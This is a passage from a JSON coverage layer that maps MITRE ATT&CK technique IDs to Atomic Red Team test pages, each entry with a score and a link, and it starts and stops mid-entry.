"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcan